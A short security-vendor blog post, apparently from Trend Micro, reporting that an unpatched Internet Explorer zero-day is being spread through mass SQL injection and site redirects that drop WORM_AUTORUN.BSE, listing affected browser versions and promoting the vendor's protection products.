Malware criminals were quick to pounce on the recently discovered — and still unpatched — zero-day exploit for Internet Explorer and to mount mass SQL injection attacks, Trend Micro researchers have found. Researchers industry-wide have correctly warned that it was only a matter of time before this exploit, which is publicly available, was used for a wider scope of attack. The folks at the SANS Internet Storm Center (ISC) are also reporting this.
The second is a Chinese sporting goods site with a traffic rank of close to 7 million, which was found containing HTML code directing users to a remote site which contains the same malicious script.
Fig. 1. A webpage of the compromised popular Chinese skating/sporting goods site
Fig. 2. An image of an injected redirection to a third-party site hosting the exploit
The final payload is a worm detected by Trend Micro as WORM_AUTORUN.BSE. Other exploits that also lead to the worm are as follows:
Microsoft posted revisions to its Security Advisory with the latest analysis about the underlying flaw in this attack, which the advisory also states, renders Microsoft Internet Explorer 5.01 Service Pack 4, Microsoft Internet Explorer 6 Service Pack 1, Microsoft Internet Explorer 6, and Windows Internet Explorer 8 Beta 2 on all supported versions of Microsoft Windows as potentially vulnerable.
The Trend Micro Smart Protection Network already detects the malicious scripts as well as WORM_AUTORUN.BSE at the desktop level, and provides solutions for the removal of the worm. We recommend using the Trend Micro Web Protection Add-On.